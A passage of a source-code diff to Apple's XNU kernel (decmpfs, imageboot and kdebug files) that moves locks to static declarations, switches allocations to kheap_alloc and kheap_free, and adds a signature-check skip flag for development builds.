VerboseLogWithPath(x...) 
do { } while(0) #endif -#if MALLOC_DEBUG - -static SInt32 totalAlloc; - -typedef struct { - uint32_t allocSz; - uint32_t magic; - const char *file; - int line; -} allocated; - -static void * -_malloc(uint32_t sz, __unused int type, __unused int flags, const char *file, int line) -{ - uint32_t allocSz = sz + 2 * sizeof(allocated); - - allocated *alloc = NULL; - MALLOC(alloc, allocated *, allocSz, type, flags); - if (!alloc) { - ErrorLog("malloc failed\n"); - return NULL; - } - - char *ret = (char*)&alloc[1]; - allocated *alloc2 = (allocated*)(ret + sz); - - alloc->allocSz = allocSz; - alloc->magic = 0xdadadada; - alloc->file = file; - alloc->line = line; - - *alloc2 = *alloc; - - int s = OSAddAtomic(sz, &totalAlloc); - ErrorLog("malloc(%d) -> %p, total allocations %d\n", sz, ret, s + sz); - - return ret; -} - -static void -_free(char *ret, __unused int type, const char *file, int line) -{ - if (!ret) { - ErrorLog("freeing null\n"); - return; - } - allocated *alloc = (allocated*)ret; - alloc--; - uint32_t sz = alloc->allocSz - 2 * sizeof(allocated); - allocated *alloc2 = (allocated*)(ret + sz); - - if (alloc->magic != 0xdadadada) { - panic("freeing bad pointer"); - } - - if (memcmp(alloc, alloc2, sizeof(*alloc)) != 0) { - panic("clobbered data"); - } - - memset(ret, 0xce, sz); - alloc2->file = file; - alloc2->line = line; - FREE(alloc, type); - int s = OSAddAtomic(-sz, &totalAlloc); - ErrorLog("free(%p,%d) -> total allocations %d\n", ret, sz, s - sz); -} - -#undef MALLOC -#undef FREE -#define MALLOC(space, cast, size, type, flags) (space) = (cast)_malloc(size, type, flags, __FILE__, __LINE__) -#define FREE(addr, type) _free((void *)addr, type, __FILE__, __LINE__) - -#endif /* MALLOC_DEBUG */ - #pragma mark --- globals --- -static lck_grp_t *decmpfs_lockgrp; +static LCK_GRP_DECLARE(decmpfs_lockgrp, "VFSCOMP"); +static LCK_RW_DECLARE(decompressorsLock, &decmpfs_lockgrp); +static LCK_MTX_DECLARE(decompress_channel_mtx, &decmpfs_lockgrp); static const 
decmpfs_registration *decompressors[CMP_MAX]; /* the registered compressors */ -static lck_rw_t * decompressorsLock; static int decompress_channel; /* channel used by decompress_file to wake up waiters */ -static lck_mtx_t *decompress_channel_mtx; vfs_context_t decmpfs_ctx; @@ -280,20 +200,20 @@ _decmp_get_func(vnode_t vp, uint32_t type, uintptr_t offset, uint32_t discrimina snprintf(resourceName, sizeof(resourceName), "com.apple.AppleFSCompression.Type%u", type); ErrorLogWithPath("waiting for %s\n", resourceName); while (decompressors[type] == NULL) { - lck_rw_unlock_shared(decompressorsLock); // we have to unlock to allow the kext to register + lck_rw_unlock_shared(&decompressorsLock); // we have to unlock to allow the kext to register if (IOServiceWaitForMatchingResource(resourceName, delay)) { - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); break; } if (!IOCatalogueMatchingDriversPresent(providesName)) { // ErrorLogWithPath("the kext with %s is no longer present\n", providesName); - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); break; } ErrorLogWithPath("still waiting for %s\n", resourceName); delay *= 2; - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); } // IOKit says the kext is loaded, so it should be registered too! 
if (decompressors[type] == NULL) { @@ -351,13 +271,13 @@ void decmpfs_cnode_init(decmpfs_cnode *cp) { memset(cp, 0, sizeof(*cp)); - lck_rw_init(&cp->compressed_data_lock, decmpfs_lockgrp, NULL); + lck_rw_init(&cp->compressed_data_lock, &decmpfs_lockgrp, NULL); } void decmpfs_cnode_destroy(decmpfs_cnode *cp) { - lck_rw_destroy(&cp->compressed_data_lock, decmpfs_lockgrp); + lck_rw_destroy(&cp->compressed_data_lock, &decmpfs_lockgrp); } bool @@ -549,7 +469,7 @@ decmpfs_cnode_cmp_type(decmpfs_cnode *cp) #pragma mark --- decmpfs state routines --- static int -decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **hdrOut, int returnInvalid) +decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **hdrOut, int returnInvalid, size_t *hdr_size) { /* * fetches vp's compression xattr, converting it into a decmpfs_header; returns 0 or errno @@ -559,6 +479,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** size_t read_size = 0; size_t attr_size = 0; + size_t alloc_size = 0; uio_t attr_uio = NULL; int err = 0; char *data = NULL; @@ -581,7 +502,8 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** if (no_additional_data) { /* this file's xattr didn't have any extra data when we fetched it, so we can synthesize a header from the data in the cnode */ - MALLOC(data, char *, sizeof(decmpfs_header), M_TEMP, M_WAITOK); + alloc_size = sizeof(decmpfs_header); + data = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK); if (!data) { err = ENOMEM; goto out; @@ -609,6 +531,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** if (err != 0) { goto out; } + alloc_size = attr_size + sizeof(hdr->attr_size); if (attr_size < sizeof(decmpfs_disk_header) || attr_size > MAX_DECMPFS_XATTR_SIZE) { err = EINVAL; @@ -616,7 +539,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** } /* allocation includes space for the extra 
attr_size field of a compressed_header */ - MALLOC(data, char *, attr_size + sizeof(hdr->attr_size), M_TEMP, M_WAITOK); + data = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK); if (!data) { err = ENOMEM; goto out; @@ -669,12 +592,11 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** out: if (err && (err != ERANGE)) { DebugLogWithPath("err %d\n", err); - if (data) { - FREE(data, M_TEMP); - } + kheap_free(KHEAP_TEMP, data, alloc_size); *hdrOut = NULL; } else { *hdrOut = hdr; + *hdr_size = alloc_size; } /* * Trace the following parameters on return with event-id 0x03120004. @@ -744,9 +666,10 @@ errno_t decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp) { /* give a compressor a chance to indicate that a compressed file is invalid */ - decmpfs_header *hdr = NULL; - errno_t err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + size_t alloc_size = 0; + errno_t err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size); + if (err) { /* we couldn't get the header */ if (decmpfs_fast_get_state(cp) == FILE_IS_NOT_COMPRESSED) { @@ -757,7 +680,7 @@ decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp) } if (!decmpfs_type_is_dataless(hdr->compression_type)) { - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_validate_compressed_file_func validate = decmp_get_func(vp, hdr->compression_type, validate); if (validate) { /* make sure this validation function is valid */ /* is the data okay? 
*/ @@ -769,11 +692,11 @@ decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp) /* no validate registered, so nothing to do */ err = 0; } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); } out: - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } #if COMPRESSION_DEBUG if (err) { @@ -799,6 +722,7 @@ decmpfs_file_is_compressed(vnode_t vp, decmpfs_cnode *cp) uint32_t cmp_state; struct vnode_attr va_fetch; decmpfs_header *hdr = NULL; + size_t alloc_size = 0; mount_t mp = NULL; int cnode_locked = 0; int saveInvalid = 0; // save the header data even though the type was out of range @@ -882,7 +806,7 @@ decmpfs_file_is_compressed(vnode_t vp, decmpfs_cnode *cp) } if (va_fetch.va_flags & UF_COMPRESSED) { /* UF_COMPRESSED is on, make sure the file has the DECMPFS_XATTR_NAME xattr */ - error = decmpfs_fetch_compressed_header(vp, cp, &hdr, 1); + error = decmpfs_fetch_compressed_header(vp, cp, &hdr, 1, &alloc_size); if ((hdr != NULL) && (error == ERANGE)) { saveInvalid = 1; } @@ -942,12 +866,12 @@ done: ubc_setsize(vp, hdr->uncompressed_size); /* update the decompression flags in the decmpfs cnode */ - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_get_decompression_flags_func get_flags = decmp_get_func(vp, hdr->compression_type, get_flags); if (get_flags) { decompression_flags = get_flags(vp, decmpfs_ctx, hdr); } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); decmpfs_cnode_set_decompression_flags(cp, decompression_flags); } } else { @@ -959,9 +883,10 @@ done: decmpfs_unlock_compressed_data(cp, 1); } - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } + /* * Trace the following parameters on return with event-id 0x03120014. 
* @@ -1021,7 +946,8 @@ decmpfs_update_attributes(vnode_t vp, struct vnode_attr *vap) } decmpfs_header *hdr = NULL; - error = decmpfs_fetch_compressed_header(vp, NULL, &hdr, 1); + size_t alloc_size = 0; + error = decmpfs_fetch_compressed_header(vp, NULL, &hdr, 1, &alloc_size); if (error == 0) { /* * Allow the flag to be set since the decmpfs attribute @@ -1043,8 +969,8 @@ decmpfs_update_attributes(vnode_t vp, struct vnode_attr *vap) /* no DECMPFS_XATTR_NAME attribute, so deny the update */ vap->va_flags &= ~UF_COMPRESSED; } - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } } } @@ -1057,15 +983,15 @@ static int wait_for_decompress(decmpfs_cnode *cp) { int state; - lck_mtx_lock(decompress_channel_mtx); + lck_mtx_lock(&decompress_channel_mtx); do { state = decmpfs_fast_get_state(cp); if (state != FILE_IS_CONVERTING) { /* file is not decompressing */ - lck_mtx_unlock(decompress_channel_mtx); + lck_mtx_unlock(&decompress_channel_mtx); return state; } - msleep((caddr_t)&decompress_channel, decompress_channel_mtx, PINOD, "wait_for_decompress", NULL); + msleep((caddr_t)&decompress_channel, &decompress_channel_mtx, PINOD, "wait_for_decompress", NULL); } while (1); } @@ -1145,7 +1071,7 @@ register_decmpfs_decompressor(uint32_t compression_type, const decmpfs_registrat goto out; } - lck_rw_lock_exclusive(decompressorsLock); locked = 1; + lck_rw_lock_exclusive(&decompressorsLock); locked = 1; /* make sure the registration for this type is zero */ if (decompressors[compression_type] != NULL) { @@ -1158,7 +1084,7 @@ register_decmpfs_decompressor(uint32_t compression_type, const decmpfs_registrat out: if (locked) { - lck_rw_unlock_exclusive(decompressorsLock); + lck_rw_unlock_exclusive(&decompressorsLock); } return ret; } @@ -1177,7 +1103,7 @@ unregister_decmpfs_decompressor(uint32_t compression_type, decmpfs_registration goto out; } - lck_rw_lock_exclusive(decompressorsLock); locked = 1; + 
lck_rw_lock_exclusive(&decompressorsLock); locked = 1; if (decompressors[compression_type] != registration) { ret = EEXIST; goto out; @@ -1188,7 +1114,7 @@ unregister_decmpfs_decompressor(uint32_t compression_type, decmpfs_registration out: if (locked) { - lck_rw_unlock_exclusive(decompressorsLock); + lck_rw_unlock_exclusive(&decompressorsLock); } return ret; } @@ -1200,11 +1126,11 @@ compression_type_valid(vnode_t vp, decmpfs_header *hdr) int ret = 0; /* every compressor must have at least a fetch function */ - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); if (decmp_get_func(vp, hdr->compression_type, fetch) != NULL) { ret = 1; } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); return ret; } @@ -1253,11 +1179,11 @@ decmpfs_fetch_uncompressed_data(vnode_t vp, decmpfs_cnode *cp, decmpfs_header *h */ DECMPFS_EMIT_TRACE_ENTRY(DECMPDBG_FETCH_UNCOMPRESSED_DATA, vp->v_id, hdr->compression_type, (int)offset, (int)size); - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_fetch_uncompressed_data_func fetch = decmp_get_func(vp, hdr->compression_type, fetch); if (fetch) { err = fetch(vp, decmpfs_ctx, hdr, offset, size, nvec, vec, bytes_read); - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); if (err == 0) { uint64_t decompression_flags = decmpfs_cnode_get_decompression_flags(cp); if (decompression_flags & DECMPFS_FLAGS_FORCE_FLUSH_ON_DECOMPRESS) { @@ -1272,7 +1198,7 @@ decmpfs_fetch_uncompressed_data(vnode_t vp, decmpfs_cnode *cp, decmpfs_header *h } } else { err = ENOTSUP; - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); } /* * Trace the following parameters on return with event-id 0x03120008. 
@@ -1333,6 +1259,7 @@ decmpfs_pagein_compressed(struct vnop_pagein_args *ap, int *is_compressed, decmp size_t verify_block_size = 0; void *data = NULL; decmpfs_header *hdr = NULL; + size_t alloc_size = 0; uint64_t cachedSize = 0; int cmpdata_locked = 0; bool file_tail_page_valid = false; @@ -1349,7 +1276,7 @@ decmpfs_pagein_compressed(struct vnop_pagein_args *ap, int *is_compressed, decmp DebugLogWithPath("pagein: unknown flags 0x%08x\n", (flags & ~(UPL_IOSYNC | UPL_NOCOMMIT | UPL_NORDAHEAD))); } - err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size); if (err != 0) { goto out; } @@ -1613,8 +1540,8 @@ out: if (data) { ubc_upl_unmap(pl); } - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } if (cmpdata_locked) { decmpfs_unlock_compressed_data(cp, 0); @@ -1622,10 +1549,9 @@ out: if (err) { #if 0 if (err != ENXIO && err != ENOSPC) { - char *path; - MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK); + char *path = zalloc(ZV_NAMEI); panic("%s: decmpfs_pagein_compressed: err %d", vnpath(vp, path, PATH_MAX), err); - FREE(path, M_TEMP); + zfree(ZV_NAMEI, path); } #endif /* 0 */ ErrorLogWithPath("err %d\n", err); @@ -1654,6 +1580,7 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c upl_t upl = NULL; upl_page_info_t *pli = NULL; decmpfs_header *hdr = NULL; + size_t alloc_size = 0; uint64_t cachedSize = 0; off_t uioPos = 0; user_ssize_t uioRemaining = 0; @@ -1694,7 +1621,7 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c goto out; } - err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size); if (err != 0) { goto out; } @@ -1709,14 +1636,14 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c DebugLogWithPath("uplPos %lld uplSize %lld\n", (uint64_t)uplPos, (uint64_t)uplSize); #endif - 
lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_adjust_fetch_region_func adjust_fetch = decmp_get_func(vp, hdr->compression_type, adjust_fetch); if (adjust_fetch) { /* give the compressor a chance to adjust the portion of the file that we read */ adjust_fetch(vp, decmpfs_ctx, hdr, &uplPos, &uplSize); VerboseLogWithPath("adjusted uplPos %lld uplSize %lld\n", (uint64_t)uplPos, (uint64_t)uplSize); } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); /* clip the adjusted size to the size of the file */ if ((uint64_t)uplPos + uplSize > cachedSize) { @@ -1791,10 +1718,9 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c if (kr != KERN_SUCCESS) { commit_upl(upl, 0, curUplSize, UPL_ABORT_FREE_ON_EMPTY, 1); #if 0 - char *path; - MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK); + char *path = zalloc(ZV_NAMEI); panic("%s: decmpfs_read_compressed: ubc_upl_map error %d", vnpath(vp, path, PATH_MAX), (int)kr); - FREE(path, M_TEMP); + zfree(ZV_NAMEI, path); #else /* 0 */ ErrorLogWithPath("ubc_upl_map kr=0x%x\n", (int)kr); #endif /* 0 */ @@ -1901,8 +1827,8 @@ decompress: out: - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } if (cmpdata_locked) { decmpfs_unlock_compressed_data(cp, 0); @@ -1929,6 +1855,7 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp) * then delete the file's compression xattr */ decmpfs_header *hdr = NULL; + size_t alloc_size = 0; /* * Trace the following parameters on entry with event-id 0x03120010. 
@@ -1937,11 +1864,11 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp) */ DECMPFS_EMIT_TRACE_ENTRY(DECMPDBG_FREE_COMPRESSED_DATA, vp->v_id); - int err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + int err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size); if (err) { ErrorLogWithPath("decmpfs_fetch_compressed_header err %d\n", err); } else { - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_free_compressed_data_func free_data = decmp_get_func(vp, hdr->compression_type, free_data); if (free_data) { err = free_data(vp, decmpfs_ctx, hdr); @@ -1949,7 +1876,7 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp) /* nothing to do, so no error */ err = 0; } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); if (err != 0) { ErrorLogWithPath("decompressor err %d\n", err); @@ -1965,13 +1892,9 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp) /* delete the xattr */ err = vn_removexattr(vp, DECMPFS_XATTR_NAME, 0, decmpfs_ctx); - if (err != 0) { - goto out; - } -out: - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } return err; } @@ -2018,6 +1941,7 @@ decmpfs_decompress_file(vnode_t vp, decmpfs_cnode *cp, off_t toSize, int truncat int update_file_state = 0; size_t allocSize = 0; decmpfs_header *hdr = NULL; + size_t hdr_size = 0; int cmpdata_locked = 0; off_t remaining = 0; uint64_t uncompressed_size = 0; @@ -2077,7 +2001,7 @@ decompress: } } - err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &hdr_size); if (err != 0) { goto out; } @@ -2096,7 +2020,7 @@ decompress: } allocSize = MIN(64 * 1024, (size_t)toSize); - MALLOC(data, char *, allocSize, M_TEMP, M_WAITOK); + data = kheap_alloc(KHEAP_TEMP, allocSize, Z_WAITOK); if (!data) { err = ENOMEM; goto out; @@ -2210,12 +2134,10 @@ nodecmp: #endif out: - if (hdr) { - FREE(hdr, M_TEMP); - } - 
if (data) { - FREE(data, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, hdr_size); } + kheap_free(KHEAP_TEMP, data, allocSize); if (uio_w) { uio_free(uio_w); } @@ -2231,10 +2153,10 @@ out: } if (update_file_state) { - lck_mtx_lock(decompress_channel_mtx); + lck_mtx_lock(&decompress_channel_mtx); decmpfs_cnode_set_vnode_state(cp, new_state, 1); wakeup((caddr_t)&decompress_channel); /* wake up anyone who might have been waiting for decompression */ - lck_mtx_unlock(decompress_channel_mtx); + lck_mtx_unlock(&decompress_channel_mtx); } if (cmpdata_locked) { @@ -2318,7 +2240,7 @@ SECURITY_READ_ONLY_EARLY(static decmpfs_registration) Type1Reg = #pragma mark --- decmpfs initialization --- void -decmpfs_init() +decmpfs_init(void) { static int done = 0; if (done) { @@ -2327,12 +2249,6 @@ decmpfs_init() decmpfs_ctx = vfs_context_create(vfs_context_kernel()); - lck_grp_attr_t *attr = lck_grp_attr_alloc_init(); - decmpfs_lockgrp = lck_grp_alloc_init("VFSCOMP", attr); - lck_grp_attr_free(attr); - decompressorsLock = lck_rw_alloc_init(decmpfs_lockgrp, NULL); - decompress_channel_mtx = lck_mtx_alloc_init(decmpfs_lockgrp, NULL); - register_decmpfs_decompressor(CMP_Type1, &Type1Reg); done = 1; diff --git a/bsd/kern/imageboot.c b/bsd/kern/imageboot.c index 36a275c68..1672c8f1f 100644 --- a/bsd/kern/imageboot.c +++ b/bsd/kern/imageboot.c @@ -91,7 +91,7 @@ static boolean_t imageboot_setup_new(imageboot_type_t type); void *ubc_getobject_from_filename(const char *filename, struct vnode **vpp, off_t *file_size); -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; #define kIBFilePrefix "file://" @@ -199,12 +199,12 @@ extern bool IOBaseSystemARVRootHashAvailable(void); * It will be mounted at mount_path. * The vfs_switch_root operation will be performed. * After the pivot, the outgoing root filesystem (the filesystem at root when - * this function begins) will be at outgoing_root_path. 
If `rooted_dmg` is true, - * then ignore then chunklisted or authAPFS checks on this image + * this function begins) will be at outgoing_root_path. If `skip_signature_check` is true, + * then ignore the chunklisted or authAPFS checks on this image */ __private_extern__ int imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path, - const char *outgoing_root_path, const bool rooted_dmg) + const char *outgoing_root_path, const bool rooted_dmg, const bool skip_signature_check) { int error; boolean_t authenticated_dmg_chunklist = false; @@ -324,8 +324,9 @@ imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char /* * If we are using a custom rooted DMG, or if we have already authenticated * the DMG via chunklist, then it is permissible to use. + * Or, if CSR_ALLOW_ANY_RECOVERY_OS is set on Development or Debug build variant. */ - if (rooted_dmg || authenticated_dmg_chunklist) { + if (rooted_dmg || authenticated_dmg_chunklist || skip_signature_check) { rootauth = 0; } error = rootauth; @@ -505,7 +506,7 @@ imageboot_mount_image(const char *root_path, int height, imageboot_type_t type) vnode_ref(newdp); vnode_put(newdp); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); /* switch to the new rootvnode */ if (update_rootvnode) { rootvnode = newdp; @@ -518,7 +519,7 @@ imageboot_mount_image(const char *root_path, int height, imageboot_type_t type) mount_unlock(new_rootfs); filedesc0.fd_cdir = newdp; - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); DBG_TRACE("%s: root switched\n", __FUNCTION__); @@ -696,6 +697,9 @@ imgboot_get_image_file(const char *path, off_t *fsize, int *errp) } if (err) { + if (vp) { + vnode_put(vp); + } *errp = err; vp = NULL; } @@ -843,15 +847,15 @@ imageboot_mount_ramdisk(const char *path) #endif /* ... 
and unmount everything */ - vfs_unmountall(); + vfs_unmountall(FALSE); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); filedesc0.fd_cdir = NULL; tvp = rootvnode; rootvnode = NULL; rootvp = NULLVP; rootdev = NODEV; - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); vnode_get_and_drop_always(tvp); /* Attach the ramfs image ... */ @@ -876,7 +880,7 @@ imageboot_mount_ramdisk(const char *path) } vnode_ref(newdp); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); rootvnode = newdp; rootvnode->v_flag |= VROOT; new_rootfs = rootvnode->v_mount; @@ -887,7 +891,7 @@ imageboot_mount_ramdisk(const char *path) set_fake_bootuuid(new_rootfs); filedesc0.fd_cdir = newdp; - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); vnode_put(newdp); diff --git a/bsd/kern/kdebug.c b/bsd/kern/kdebug.c index f0ca4b75c..2d3de0289 100644 --- a/bsd/kern/kdebug.c +++ b/bsd/kern/kdebug.c @@ -440,8 +440,9 @@ unsigned int kdlog_value2 = 0; unsigned int kdlog_value3 = 0; unsigned int kdlog_value4 = 0; -static lck_spin_t * kdw_spin_lock; -static lck_spin_t * kds_spin_lock; +static LCK_GRP_DECLARE(kdebug_lck_grp, "kdebug"); +static LCK_SPIN_DECLARE(kdw_spin_lock, &kdebug_lck_grp); +static LCK_SPIN_DECLARE(kds_spin_lock, &kdebug_lck_grp); kd_threadmap *kd_mapptr = 0; vm_size_t kd_mapsize = 0; @@ -665,8 +666,6 @@ kdbg_iop_list_callback(kd_iop_t* iop, kd_callback_type type, void* arg) } } -static lck_grp_t *kdebug_lck_grp = NULL; - static void kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type) { @@ -679,7 +678,7 @@ kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type) NULL); int s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); if (enabled) { /* @@ -696,7 +695,7 @@ kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type) 
kd_ctrl_page.enabled = 0; commpage_update_kdebug_state(); } - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); if (enabled) { @@ -712,7 +711,7 @@ static void kdbg_set_flags(int slowflag, int enableflag, bool enabled) { int s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); if (enabled) { kd_ctrl_page.kdebug_slowcheck |= slowflag; @@ -722,7 +721,7 @@ kdbg_set_flags(int slowflag, int enableflag, bool enabled) kdebug_enable &= ~enableflag; } - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); } @@ -734,7 +733,7 @@ disable_wrap(uint32_t *old_slowcheck, uint32_t *old_flags) { bool wrapped; int s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); *old_slowcheck = kd_ctrl_page.kdebug_slowcheck; *old_flags = kd_ctrl_page.kdebug_flags; @@ -743,7 +742,7 @@ disable_wrap(uint32_t *old_slowcheck, uint32_t *old_flags) kd_ctrl_page.kdebug_flags &= ~KDBG_WRAPPED; kd_ctrl_page.kdebug_flags |= KDBG_NOWRAP; - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); return wrapped; @@ -753,7 +752,7 @@ static void enable_wrap(uint32_t old_slowcheck) { int s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); kd_ctrl_page.kdebug_flags &= ~KDBG_NOWRAP; @@ -761,7 +760,7 @@ enable_wrap(uint32_t old_slowcheck) kd_ctrl_page.kdebug_slowcheck &= ~SLOW_NOLOG; } - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); } @@ -935,7 +934,7 @@ release_storage_unit(int cpu, uint32_t kdsp_raw) kdsp.raw = kdsp_raw; s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); 
kdbp = &kdbip[cpu]; @@ -958,7 +957,7 @@ release_storage_unit(int cpu, uint32_t kdsp_raw) kd_ctrl_page.kds_inuse_count--; } - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); } @@ -973,7 +972,7 @@ allocate_storage_unit(int cpu) int s = 0; s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); kdbp = &kdbip[cpu]; @@ -1081,7 +1080,7 @@ allocate_storage_unit(int cpu) } kdbp->kd_list_tail = kdsp; out: - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); return retval; @@ -2066,27 +2065,6 @@ kdebug_trace_string(__unused struct proc *p, return 0; } -static void -kdbg_lock_init(void) -{ - static lck_grp_attr_t *kdebug_lck_grp_attr = NULL; - static lck_attr_t *kdebug_lck_attr = NULL; - - if (kd_ctrl_page.kdebug_flags & KDBG_LOCKINIT) { - return; - } - - assert(kdebug_lck_grp_attr == NULL); - kdebug_lck_grp_attr = lck_grp_attr_alloc_init(); - kdebug_lck_grp = lck_grp_alloc_init("kdebug", kdebug_lck_grp_attr); - kdebug_lck_attr = lck_attr_alloc_init(); - - kds_spin_lock = lck_spin_alloc_init(kdebug_lck_grp, kdebug_lck_attr); - kdw_spin_lock = lck_spin_alloc_init(kdebug_lck_grp, kdebug_lck_attr); - - kd_ctrl_page.kdebug_flags |= KDBG_LOCKINIT; -} - int kdbg_bootstrap(bool early_trace) { @@ -2425,8 +2403,6 @@ kdebug_reset(void) { ktrace_assert_lock_held(); - kdbg_lock_init(); - kdbg_clear(); if (kdbg_typefilter) { typefilter_reject_all(kdbg_typefilter); @@ -3354,7 +3330,7 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait) if (!s) { panic("kdbg_wait() called with interrupts disabled"); } - lck_spin_lock_grp(kdw_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kdw_spin_lock, &kdebug_lck_grp); if (!locked_wait) { /* drop the mutex to allow others to access trace */ @@ -3366,9 +3342,9 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait) kds_waiter = 1; if (abstime) { - 